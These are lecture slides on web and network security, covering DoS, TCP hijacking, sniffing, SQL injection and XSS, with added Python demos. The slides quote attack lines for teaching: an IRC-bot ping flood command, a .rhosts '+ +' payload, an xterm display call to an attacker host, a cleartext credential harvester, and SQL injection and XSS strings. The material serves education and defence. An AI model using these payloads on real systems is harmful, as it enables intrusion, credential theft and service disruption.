Web Application and network security
Rishabh Mehan
Saying Hello !!
To start off with the introduction, let's go through a few basics:
• What is a Web Application?
• Where is it deployed?
• How can it be reached?
Web Application Protocols
• HTTP / HTTPS
• FTP / SFTP
• TCP
• SSH
(HTTP, FTP and SSH all ride on TCP; SFTP is file transfer over SSH, not FTP over TLS.)
Request Methods
• GET: form data is encoded in the URL (query string). Anything in the URL also lands in server access logs, proxy logs, browser history and the Referer header of the next request.
• POST: data is included in the body of the request. A real POST also carries Content-Type and Content-Length headers describing that body (omitted on the slide).
The absolute URL in the request line below is the form a browser uses when talking through a proxy; a direct request carries only the path (GET /kgsearch/search.php?catid=1 HTTP/1.1).

GET request:

GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.mysite.com/

POST request:

POST http://www.mysite.com/kgsearch/search.php HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.mysite.com/

catid=1
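The same two requests parsed by hand, as an added example that is not part of the original deck: it shows where the catid parameter travels in each case and which of the two leaves a trace in the URL. The two request strings are constructed here to mirror the slide (header set trimmed, and with the Content-Type/Content-Length headers a real POST carries); the host name and paths are the slide's.

```python
"""Parse raw HTTP requests like the two on the slide and show where the
'catid' parameter travels: in the request line (GET) or in the body (POST).
Added example, not from the original deck. The two requests are constructed
to mirror the slide, with the header set trimmed and the Content-Type and
Content-Length headers that a real POST carries (not shown on the slide)."""
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests. The absolute URL in the request line is the
# form a browser uses when talking through a proxy; direct requests carry
# only the path ("GET /kgsearch/search.php?catid=1 HTTP/1.1").
GET_REQUEST = (
    "GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1\r\n"
    "Host: www.mysite.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://www.mysite.com/\r\n"
    "\r\n"
)
POST_REQUEST = (
    "POST http://www.mysite.com/kgsearch/search.php HTTP/1.1\r\n"
    "Host: www.mysite.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 7\r\n"
    "\r\n"
    "catid=1"
)


def parse_request(raw: str) -> dict:
    """Split a raw request into method, path, headers, body and the merged
    parameter set (query string first, form body layered on top)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    in_url = set(params)
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        # Only trust as many bytes as Content-Length declares.
        length = int(headers.get("content-length", "0"))
        body = body[:length]
        params.update({k: v[0] for k, v in parse_qs(body).items()})
    return {
        "method": method,
        "version": version,
        "path": url.path,
        "headers": headers,
        "params": params,
        "params_in_url": in_url,  # these end up in logs, history and Referer headers
        "body": body,
    }


def leaks_via_url(raw: str, name: str) -> bool:
    """True if parameter `name` is carried in the URL and therefore shows up
    in access logs, proxy logs, browser history and outbound Referer headers."""
    return name in parse_request(raw)["params_in_url"]


if __name__ == "__main__":
    for req in (GET_REQUEST, POST_REQUEST):
        p = parse_request(req)
        print(p["method"], p["path"], p["params"],
              "catid in URL:", leaks_via_url(req, "catid"))
```

Both requests yield the same parameter set, which is the point: the method changes where the value is visible, not what the application receives, so a sensitive value (session token, account number) belongs in a POST body or a header, never in a GET query string.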
How a Request flows
[Diagram: Client PC (10.1.0.123) sends a Request to Server www.mybank.com (64.58.76.230) on port 80 and receives a Response.]
Words of Wisdom
“Every program has at least two purposes: the one for
which it was written, and another for which it wasn't.”

-Alan J. Perlis
Infrastructure
Very complex architectures, multiple platforms, multiple protocols.
[Diagram of a web application stack and its components: Browser, Presentation Layer, Wireless, Network, HTTP, Web Servers, Application Server, Business Logic, Customer Identification, Access Controls, Content Services, Media Store, Database Server, Transaction Information, Core Business Data.]
Why vulnerabilities: the Web Application Security Gap
Security professionals don't know the applications:
"As a Network Security Professional, I don't know how my company's web applications are supposed to work, so I deploy a protective solution... but don't know if it's protecting what it's supposed to."
Application developers and QA professionals don't know security:
"As an Application Developer, I can build great features and functions while meeting deadlines, but I don't know how to develop my web application with security as a feature."
Common security attacks and their countermeasures
• Finding a way into the network: Firewalls
• Exploiting software bugs, buffer overflows: Intrusion Detection Systems (an IDS detects the exploitation; patching and memory-safe coding are what prevent it)
• Denial of Service: Ingress filtering, IDS
• TCP hijacking: IPSec
• Packet sniffing: Encryption (SSH, SSL/TLS, HTTPS)
• Social problems: Education
Firewalls
• Basic problem: many network applications and protocols have security problems that are fixed over time
  • Difficult for users to keep up with changes and keep hosts secure
• Solution
  • Administrators limit access to end hosts by using a firewall
  • The firewall is kept up-to-date by administrators
Firewalls
[Diagram: Internet | Firewall | DMZ (web server, email server, web proxy, etc.) | Firewall | Intranet. Only the DMZ hosts are reachable from the Internet; the inner firewall keeps a compromised DMZ host from reaching the intranet.]
Firewalls
• What does a firewall rule look like? Depends on the firewall used.
• Example: ipfw (FreeBSD)
    /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet
  This denies TCP from the host cracker.evil.org to port 23 (telnet) on wolf.tambov.su. ipfw evaluates rules in order and stops at the first match, so where a deny sits relative to broader allow rules decides whether it ever fires.
• Other examples: Windows XP and Mac OS X have built-in and third-party firewalls, with different graphical user interfaces and varying amounts of complexity and power.
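A toy first-match filter that behaves the way the ipfw rule above does, added here as an example (it is not ipfw code). The slide gives only hostnames, so the two addresses below are assumed values from the documentation ranges; the second rule and the test packets are constructed to show why rule order matters.

```python
"""First-match packet filter modelled on the ipfw rule from the slide.
Added example; this is not ipfw code, and the addresses are made up
(documentation ranges) because the slide only gives hostnames."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    proto: str             # "tcp", "udp", "icmp" or "ip" (any protocol)
    src: str               # source network in CIDR form
    dst: str               # destination network in CIDR form
    dport: Optional[int]   # destination port, None = any


def matches(rule: Rule, pkt: dict) -> bool:
    if rule.proto != "ip" and rule.proto != pkt["proto"]:
        return False
    if ip_address(pkt["src"]) not in ip_network(rule.src):
        return False
    if ip_address(pkt["dst"]) not in ip_network(rule.dst):
        return False
    if rule.dport is not None and pkt.get("dport") != rule.dport:
        return False
    return True


def decide(rules, pkt: dict, default: str = "deny"):
    """Walk the list in order and stop at the first matching rule, the way
    ipfw does. Returns (action, 1-based rule number) or (default, None)."""
    for number, rule in enumerate(rules, start=1):
        if matches(rule, pkt):
            return rule.action, number
    return default, None


# Assumed addresses for the two hostnames in the slide's rule.
CRACKER = "203.0.113.7"     # cracker.evil.org (hypothetical)
WOLF = "198.51.100.10"      # wolf.tambov.su  (hypothetical)

# Rule 1 is the slide's rule (telnet is TCP port 23).
# Rule 2 is a broad allow that would otherwise let the same traffic through.
RULES = [
    Rule("deny", "tcp", CRACKER + "/32", WOLF + "/32", 23),
    Rule("allow", "tcp", "0.0.0.0/0", WOLF + "/32", None),
]
WRONG_ORDER = RULES[::-1]   # same rules, broad allow first: the deny never fires

TELNET_FROM_CRACKER = {"proto": "tcp", "src": CRACKER, "dst": WOLF, "dport": 23}
SSH_FROM_ELSEWHERE = {"proto": "tcp", "src": "192.0.2.44", "dst": WOLF, "dport": 22}
DNS_UDP = {"proto": "udp", "src": "192.0.2.44", "dst": WOLF, "dport": 53}

if __name__ == "__main__":
    for name, pkt in [("telnet from cracker", TELNET_FROM_CRACKER),
                      ("ssh from elsewhere", SSH_FROM_ELSEWHERE),
                      ("udp dns", DNS_UDP)]:
        print(f"{name:20s} right order: {decide(RULES, pkt)}  "
              f"wrong order: {decide(WRONG_ORDER, pkt)}")
```

The UDP packet matches nothing and falls through to the default; keeping that default at deny is what turns a list of exceptions into a useful firewall. Swapping the two rules silently lets the telnet session through, which is the mistake to look for when reviewing a real rule set.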
Denial of Service
• Purpose: make a network service unusable, usually by overloading the server or the network
• Many different kinds of DoS attacks
  • SYN flooding
  • SMURF
  • Distributed attacks
Denial of Service
• SYN flooding attack
  • Send SYN packets with bogus source addresses
  • Why? The server responds with a SYN-ACK and keeps state about the half-open TCP connection; the SYN-ACK goes to the bogus address and is never acknowledged
  • Eventually the server's memory for half-open connections (the listen backlog) is exhausted by this state, and legitimate SYNs are dropped
• Solution: use "SYN cookies"
  • In response to a SYN, encode a special "cookie" (a keyed hash of the addresses, ports and a coarse timestamp) in the initial sequence number of the SYN-ACK, and forget everything else
  • Then recreate the forgotten information when the ACK comes in from a legitimate connection: its acknowledgement number is cookie+1, which the server can re-verify without any stored state
  • Caveat: a cookie has room for only a few bits, so the TCP options from the SYN (window scaling, SACK) are lost unless the client also sends timestamps; Linux therefore enables cookies (net.ipv4.tcp_syncookies=1) only once the SYN backlog is full
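A compact SYN-cookie server, added here as an example of the mechanism just described; it is not the Linux implementation and not from the deck. The bit layout (24-bit keyed hash, 5 bits of a 64-second counter, 3-bit MSS index), the MSS table and the secret are assumptions chosen to keep it readable; the client and server addresses are the ones on the request-flow slide.

```python
"""A small SYN-cookie implementation in the style described above: the
server's initial sequence number *is* the cookie, so a SYN allocates no
state. Added example, not from the original deck and not the Linux code;
the bit layout, the MSS table and the secret are assumptions."""
import hashlib
import hmac
import struct
from ipaddress import ip_address

SECRET = b"constructed-per-boot-secret"   # assumed; a real server draws this at boot
MSS_TABLE = (536, 1300, 1440, 1460)        # the only MSS values the 3-bit field encodes
COUNTER_PERIOD_S = 64                       # cookies stay valid for about two periods


def _tag(saddr, daddr, sport, dport, count, secret):
    """24-bit keyed hash over the 4-tuple and the time counter."""
    msg = struct.pack("!IIHHI", int(ip_address(saddr)), int(ip_address(daddr)),
                      sport, dport, count)
    mac = hmac.new(secret, msg, hashlib.sha256).digest()
    return int.from_bytes(mac[:3], "big")


def make_cookie(saddr, daddr, sport, dport, mss, count, secret=SECRET):
    """Cookie = 24-bit tag | 5 low bits of the counter | 3-bit MSS index."""
    encodable = [i for i, m in enumerate(MSS_TABLE) if m <= mss] or [0]
    mss_idx = encodable[-1]
    tag = _tag(saddr, daddr, sport, dport, count, secret)
    return ((tag << 8) | ((count & 0x1F) << 3) | mss_idx) & 0xFFFFFFFF


def check_cookie(saddr, daddr, sport, dport, ack, now, secret=SECRET):
    """Validate the client's ACK (ack = cookie + 1). Returns the MSS to use,
    or None if the cookie is forged, too old, or for another 4-tuple."""
    cookie = (ack - 1) & 0xFFFFFFFF
    count_bits = (cookie >> 3) & 0x1F
    mss_idx = cookie & 0x7
    for count in (now, now - 1):              # accept current and previous period
        if (count & 0x1F) != count_bits:
            continue
        if _tag(saddr, daddr, sport, dport, count, secret) == cookie >> 8:
            return MSS_TABLE[mss_idx]
        return None
    return None


def counter(unix_time):
    return int(unix_time) // COUNTER_PERIOD_S


class CookieListener:
    """Server side: a SYN produces a SYN-ACK and nothing else; only a valid
    ACK creates a connection entry, so a flood of bogus SYNs never grows
    `established`."""
    def __init__(self, ip, port):
        self.ip, self.port = ip, port
        self.established = {}

    def on_syn(self, client_ip, client_port, client_mss, now):
        return make_cookie(client_ip, self.ip, client_port, self.port, client_mss, now)

    def on_ack(self, client_ip, client_port, ack, now):
        mss = check_cookie(client_ip, self.ip, client_port, self.port, ack, now)
        if mss is not None:
            self.established[(client_ip, client_port)] = mss
        return mss


if __name__ == "__main__":
    srv = CookieListener("64.58.76.230", 80)
    t = counter(1_700_000_000)
    # 10,000 spoofed SYNs with bogus sources: no memory is consumed.
    for i in range(10_000):
        srv.on_syn(f"10.{(i >> 8) & 255}.{i & 255}.1", 40000 + i % 1000, 1460, t)
    # One real client completes the handshake.
    cookie = srv.on_syn("10.1.0.123", 51515, 1460, t)
    print("mss:", srv.on_ack("10.1.0.123", 51515, (cookie + 1) & 0xFFFFFFFF, t))
    print("connections:", len(srv.established))
```

The MSS table is the price of statelessness: a client asking for 1400 gets 1300 because the server kept nothing but the index, and any option that does not fit in the cookie is simply gone, which is the caveat noted above.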
Denial of Service
• SMURF
  • The source IP address of a broadcast ping is forged to be the victim's
  • A large number of machines respond to the victim, overloading it: one spoofed packet in, a reply from every host on the broadcast network out (an amplification attack)
  [Diagram: the Perpetrator sends an ICMP echo with the spoofed source address of the Victim to an IP broadcast address across the Internet; every host on that network sends an ICMP echo reply to the Victim.]
  • Countermeasure: routers must not forward directed broadcasts (RFC 2644 made that the default), and hosts should not answer echo requests sent to a broadcast address
Denial of Service
• Distributed Denial of Service
  • Same techniques as regular DoS, but on a much larger scale
  • Example: Sub7Server Trojan and IRC bots
    • Infect a large number of machines with a "zombie" program
    • The zombie program logs into an IRC channel and awaits commands
  • Example:
    • Bot command: !p4 207.71.92.193
    • Result: each bot runs ping.exe 207.71.92.193 -l 65500 -n 10000
    • That is 10,000 pings with a 65,500-byte payload each, about 655 MB from every zombie
  • Read more at: http://grc.com/dos/grcdos.htm
TCP Attacks
• Recall how IP works...
  • End hosts create IP packets and routers forward them based on the destination address alone
• Problem: end hosts may lie about other fields which do not affect delivery
  • Source address: a host may trick the destination into believing that the packet is from a trusted source
  • Especially dangerous for applications which use IP addresses as a simple authentication method (the Berkeley r-services, rsh/rlogin with .rhosts, are the classic case)
• Solution: use better authentication methods (cryptographic, not address-based)
TCP Attacks
• TCP connections have associated state: starting sequence numbers, port numbers
• Problem: what if an attacker learns these values?
  • Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)
  • Sequence numbers are sometimes chosen in very predictable ways (old BSD stacks incremented the ISN by a fixed amount per connection, which is what the Mitnick attack relied on)
TCP Attacks
• If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!
• The attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source
  • Ex. Instead of downloading and running a new program, you download a virus and execute it
TCP Attacks
• Say hello to Alice, Bob and Mr. Big Ears
• Alice and Bob have an established TCP connection
• Mr. Big Ears lies on the path between Alice and Bob on the network: he can intercept all of their packets
• First, Mr. Big Ears must drop all of Alice's packets, since they must not be delivered to Bob. (Why? Alice's real segments carry the same sequence numbers as the injected ones; if both arrive, Bob's ACKs no longer match what Alice sent, and the two ends keep ACKing each other in an "ACK storm" until the connection is reset.) [Diagram: Alice's packets go into "The Void"]
• Then, Mr. Big Ears sends his malicious packet with the next expected sequence number (sniffed from the network) and SRC=Alice. (The slide calls it the "next ISN"; the ISN is only the starting point, and what the attacker needs is the current sequence number of the stream.)
• What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?
  • Can just DoS Alice instead of dropping her packets (so she cannot answer Bob's SYN-ACK with a RST)
  • Can just send guesses of what the ISN is until one is accepted: the attacker never sees Bob's SYN-ACK, so he has to predict the ISN Bob chose for the spoofed connection and put ISN+1 in his forged ACK
• How do you know when the ISN is accepted?
  • Mitnick: payload is "add self to .rhosts" (echo "+ +" >> .rhosts); if the guess was right, the attacker can later rlogin without a password
  • Or, "xterm -display MrBigEars:0": an xterm appears on the attacker's display
TCP Attacks
• Why are these types of TCP attacks so dangerous? [Diagram: Web server, Trusting web client, Malicious user.] Whatever the server would hand the trusting client, it hands to whoever controls that client's stream.
TCP Attacks
• How do we prevent this?
• IPSec
  • Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
  • Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing the session key
• Also: unpredictable ISNs (RFC 6528: ISN = clock + a keyed hash of the addresses and ports) defeat the blind guessing above, and end-to-end TLS or SSH means injected bytes fail the record integrity check even where the TCP stream itself can be hijacked, so the worst case becomes a dropped connection rather than injected data
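The blind-guessing case above, simulated: an attacker opens a few probe connections, extrapolates the server's next initial sequence number, and sends a spoofed SYN/ACK pair as the trusted host. This is an added example, not from the deck; both ISN generators are simplified models (the old BSD constant step and the RFC 6528 secret are assumptions), and the three addresses are made up. The clock is held constant so the run is deterministic.

```python
"""Why predictable initial sequence numbers let a blind attacker spoof a
connection, and why RFC 6528-style per-connection offsets do not.
Added example, not from the original deck; both generators are simplified
models (the BSD constant step and the RFC 6528 secret are assumptions)."""
import hashlib
import hmac
import struct
from ipaddress import ip_address


class PredictableISN:
    """Old BSD behaviour: each new connection gets the last ISN plus a
    fixed increment, so a couple of probes reveal the step and the next value."""
    def __init__(self, start=0x1000, step=64000):
        self.last = start
        self.step = step

    def next_isn(self, local_ip, local_port, remote_ip, remote_port, clock):
        self.last = (self.last + self.step) & 0xFFFFFFFF
        return self.last


class RFC6528ISN:
    """ISN = clock + F(local ip, local port, remote ip, remote port, secret).
    The offset F differs per 4-tuple, so the attacker's own connections say
    nothing about the ISN chosen for the spoofed trusted host."""
    def __init__(self, secret):
        self.secret = secret

    def next_isn(self, local_ip, local_port, remote_ip, remote_port, clock):
        msg = struct.pack("!IHIH", int(ip_address(local_ip)), local_port,
                          int(ip_address(remote_ip)), remote_port)
        f = int.from_bytes(hmac.new(self.secret, msg, hashlib.sha256).digest()[:4], "big")
        return (clock + f) & 0xFFFFFFFF


def predict_next(observed):
    """Attacker extrapolates from the ISNs of probe connections it opened."""
    step = (observed[-1] - observed[-2]) & 0xFFFFFFFF
    return (observed[-1] + step) & 0xFFFFFFFF


def blind_spoof_succeeds(gen, server_ip, attacker_ip, trusted_ip, clock=0):
    """Mitnick-style attack: probe, guess the server's ISN for a SYN sent
    with the trusted host's address, and see whether the guessed ACK number
    would be accepted."""
    # Attacker's own probes (server port 513 = rlogin, attacker ports 1021..1023).
    observed = [gen.next_isn(server_ip, 513, attacker_ip, p, clock)
                for p in (1021, 1022, 1023)]
    guess = predict_next(observed)
    # The ISN the server really picks for the spoofed connection. The SYN-ACK
    # carrying it goes to the trusted host, which the attacker cannot see
    # (and has DoSed so it does not reply with a RST).
    real = gen.next_isn(server_ip, 513, trusted_ip, 1023, clock)
    return guess == real


SERVER, ATTACKER, TRUSTED = "198.51.100.5", "203.0.113.9", "198.51.100.7"   # assumed

if __name__ == "__main__":
    print("predictable ISN spoofed:", blind_spoof_succeeds(PredictableISN(), SERVER, ATTACKER, TRUSTED))
    print("RFC 6528 ISN spoofed:   ", blind_spoof_succeeds(RFC6528ISN(b"boot-secret"), SERVER, ATTACKER, TRUSTED))
```

Against the predictable generator the first guess is exact; against the keyed generator the attacker is left with a 1-in-2^32 guess per attempt, which is why every current stack randomises the per-connection offset rather than the whole ISN (a monotonic clock component keeps old segments from a previous incarnation of the same 4-tuple from being accepted).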
Packet Sniffing
• Recall how Ethernet works...
  • When someone wants to send a packet to someone else, they put the bits on the wire with the destination MAC address...
  • And remember that other hosts are listening on the wire to detect collisions...
• It couldn't get any easier to figure out what data is being transmitted over the network!
• Caveat: that describes shared-medium Ethernet (hubs). On a switched network a host only receives frames addressed to it, so a sniffer needs a mirror (SPAN) port or has to pull traffic past itself with ARP spoofing. Wi-Fi is a shared medium again: every station in range receives every frame, and only the link-layer encryption keeps it from reading them.
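What a sniffer on such a segment actually does with the bits, as an added example that is not part of the original deck: decode Ethernet/IPv4/TCP headers with struct and pull the readable payload out of cleartext protocols. The three frames are constructed inline (addresses, MAC addresses and the "hunter2" / "s3cret" credentials are made up), and checksums are left at zero because the parser does not verify them.

```python
"""Decode raw Ethernet/IPv4/TCP frames the way a sniffer does and pull the
readable payload out of cleartext protocols. Added example, not from the
original deck; the three frames are constructed here (addresses, MACs and
the 'hunter2' / 's3cret' credentials are made up)."""
import struct
from ipaddress import ip_address

CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 80: "http"}


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, payload):
    """Ethernet II + minimal IPv4 header + minimal TCP header + payload.
    Checksums are left zero; the parser does not verify them."""
    eth = (bytes.fromhex(dst_mac.replace(":", "")) +
           bytes.fromhex(src_mac.replace(":", "")) + b"\x08\x00")
    total_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0,
                     ip_address(src_ip).packed, ip_address(dst_ip).packed)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Return the TCP 4-tuple and payload, or None for non-IPv4 / non-TCP."""
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        return None
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _csum, saddr, daddr = \
        struct.unpack("!BBHHHBBH4s4s", frame[14:34])
    ihl = (ver_ihl & 0x0F) * 4
    if proto != 6:
        return None
    tcp_off = 14 + ihl
    sport, dport, seq, ack, off_res, flags, _win, _csum, _urg = \
        struct.unpack("!HHIIBBHHH", frame[tcp_off:tcp_off + 20])
    data_off = (off_res >> 4) * 4
    payload = frame[tcp_off + data_off:14 + total_len]
    return {"src": str(ip_address(saddr)), "dst": str(ip_address(daddr)),
            "sport": sport, "dport": dport, "seq": seq, "payload": payload}


def harvest_cleartext(frames):
    """What anyone on the same shared segment (or a mirrored switch port)
    sees: credentials from telnet and FTP in the clear, nothing usable from
    SSH because its payload is encrypted."""
    found = []
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None or pkt["dport"] not in CLEARTEXT_PORTS:
            continue
        text = pkt["payload"].decode("ascii", "replace").strip()
        if pkt["dport"] == 21 and text.upper().startswith("PASS "):
            text = text[5:]
        found.append((pkt["src"], pkt["dst"], CLEARTEXT_PORTS[pkt["dport"]], text))
    return found


# Constructed capture: one telnet line, one FTP PASS command, one SSH record.
# (A real telnet client sends keystrokes one byte at a time; the line is
# joined here for readability.)
CLIENT, SERVER = "10.1.0.123", "10.1.0.5"
FRAMES = [
    build_frame("00:11:22:33:44:55", "66:77:88:99:aa:bb", CLIENT, SERVER, 50001, 23, b"hunter2\r\n"),
    build_frame("00:11:22:33:44:55", "66:77:88:99:aa:bb", CLIENT, SERVER, 50002, 21, b"PASS s3cret\r\n"),
    build_frame("00:11:22:33:44:55", "66:77:88:99:aa:bb", CLIENT, SERVER, 50003, 22,
                bytes.fromhex("9f3c0a7be1d4428c5571a0ff")),
]

if __name__ == "__main__":
    for src, dst, proto, secret in harvest_cleartext(FRAMES):
        print(f"{src} -> {dst} {proto}: {secret!r}")
```

The SSH frame parses just as cleanly as the others; the difference is only that its payload is ciphertext, which is the whole argument for the "SSH, not Telnet; SFTP, not FTP; HTTPS" list that follows.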
Packet Sniffing
• How can we protect ourselves?
• SSH, not Telnet
  • Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)
  • Now that I have told you this, please do not exploit this information
  • Packet sniffing is, by the way, prohibited by Computing Services
• HTTPS (HTTP over SSL/TLS)
  • Especially when making purchases with credit cards!
• SFTP, not FTP
  • Unless you really don't care about the password or data
  • Can also use KerbFTP (download from MyAndrew)
• IPSec
  • Provides network-layer confidentiality
Web Application Vulnerabilities
Web application vulnerabilities occur in multiple areas:
• Platform: Known Vulnerabilities
• Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
• Application: Application Mapping, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Cookie Manipulation, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site scripting
What the #@$& is happening ???
[Chart: share of findings (%) by vulnerability class: Info Disclosure, File Include, Input Validation, Auth, SQL Injection, XSS; axis from 0 to 50.]
Web Application Vulnerabilities
Platform (Known Vulnerabilities):
• Known vulnerabilities can be exploited immediately with a minimum amount of skill or experience ("script kiddies")
• Most easily defendable of all web vulnerabilities
• MUST have streamlined patching procedures: know what is deployed (server, framework, libraries), follow the vendors' advisories, and patch on a schedule with a fast path for critical issues
Web Application Vulnerabilities
Administration (Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing):
• Less easily corrected than known platform issues; require increased awareness
• More than just configuration: must be aware of security flaws in the actual content
• Remnant files (old versions, test pages, default content) can reveal applications and versions in use
• Backup files (e.g. config.php.bak, .old, editor ~ files) can reveal source code and database connection strings, because the server serves them as plain text instead of executing them
Web Application Vulnerabilities
Application Programming (Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site scripting):
• Common coding techniques do not necessarily include security
• Input is assumed to be valid, but not tested
• Unexamined input from a browser can inject scripts into a page for replay against later visitors (cross-site scripting)
• Unhandled error messages reveal application and database structures
• Unchecked database calls can be "piggybacked" with a hacker's own database call, giving direct access to business data through a web browser (SQL injection)
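The last three bullets side by side with their fixes, as an added example that is not from the deck: a login query built by string concatenation next to its parameterised form, an HTML template that echoes input next to an escaped one, and a handler that keeps the driver's error text off the wire. The users table, the credentials and the two payloads are constructed for the example.

```python
"""The coding flaws called out above, each beside its fix: a login query
that lets user input become SQL, a page that echoes user input into HTML,
and a handler that leaks driver errors. Added example, not from the
original deck; the users table and credentials are constructed."""
import html
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "correct-horse", 0), ("admin", "s3cr3t", 1)])
    return db


def login_vulnerable(db, user, password):
    """'Unchecked database call': the user's text is pasted into the SQL,
    so a quote in it ends the string and the rest is executed as a query."""
    query = (f"SELECT name FROM users WHERE name = '{user}' "
             f"AND password = '{password}'")
    return [row[0] for row in db.execute(query)]


def login_safe(db, user, password):
    """Parameterised query: the driver sends the values separately from the
    statement, so a quote is just a character inside the value."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in db.execute(query, (user, password))]


def render_comment_vulnerable(text):
    """'Unexamined input replayed to later visitors': stored text is
    inserted into the page as markup."""
    return f'<p class="comment">{text}</p>'


def render_comment_safe(text):
    """Escape for the HTML text context before insertion; the browser shows
    the characters instead of executing them."""
    return f'<p class="comment">{html.escape(text, quote=True)}</p>'


def handle_login(db, user, password):
    """'Unhandled error messages': never bubble the driver's exception text
    (table and column names) to the client; log it server-side instead."""
    try:
        return {"ok": bool(login_safe(db, user, password))}
    except sqlite3.Error:
        return {"ok": False, "error": "login failed"}


PIGGYBACK = "' OR '1'='1"                       # constructed SQL injection payload
SCRIPT = "<script>alert(document.cookie)</script>"  # constructed XSS payload

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "nobody", PIGGYBACK))   # every user
    print("safe:      ", login_safe(db, "nobody", PIGGYBACK))         # nobody
    print(render_comment_vulnerable(SCRIPT))
    print(render_comment_safe(SCRIPT))
```

With the piggybacked password the concatenated query becomes `... AND password = '' OR '1'='1'`, which is true for every row, so the "login" returns all users; the parameterised version looks for a user whose password literally is that string and finds none. html.escape covers the HTML text context only; a value going into a URL, a JavaScript string or an attribute without quotes needs the escaping for that context.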
Examples
• http://demo.testfire.net/ (AltoroMutual, a deliberately vulnerable demo banking application)
• http://chat.wallhood.com/moving/moving/images/
How to Secure Web Applications
• Incorporate security into the lifecycle
  • Apply information security principles to all software development efforts (threat modelling at design time, code review and testing before release, patching afterwards)
• Educate
  • Issue awareness, training, etc.
Are We still Secure ?

LOL
NO
Questions ?
